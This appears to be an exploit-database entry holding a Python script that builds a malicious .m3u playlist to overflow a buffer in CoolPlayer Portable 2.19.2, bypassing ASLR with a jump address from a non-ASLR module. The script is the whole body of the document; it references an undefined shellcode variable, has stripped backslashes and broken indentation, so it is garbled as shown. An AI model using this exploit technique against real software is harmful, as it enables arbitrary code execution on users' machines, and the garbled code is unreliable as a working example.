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# Title : CoolPlayer Portable 2.19.2 Buffer Overflow ASLR bypass
# Published : 2012-08-05
# Author :
# Previous Title : Shadow Stream Recorder Buffer Overflow
# Next Title : python-wrapper Untrusted Search Path/Code Execution Vulnerability

# Buffer overflow that bypasses ASLR by using a non-aslr module
# Tested against CoolPlayer Portable version 2.19.2 on Windows Vista Business 32 bit
# Written by Blake patched by pole
# Originally found by Securityxxxpert

print "n====================================="
print "CoolPlayer Portable Buffer Overflow"
print "Tested on Windows Vista (ASLR Bypass)"
print "Written by Blake"
print "Patched by pole"
print "=====================================n"

# 233 bytes for shellcode available
# 227 byte windows/exec shellcode => CMD=calc.exe

nops = "x90" * 6
buffer = "x41" * (229 - len(shellcode))

eip = "x75x52x46x00"	# JMP EBX - coolplayer.exe "x75x52x46x00"	

print "[+] Creating malicious file"
	file = open("exploit.m3u","w")
	file.write(nops + shellcode + buffer + eip)
	print "[+] File created successfully"
	raw_input("[+] Press any key to exit...")
	print "[X] Error creating file!"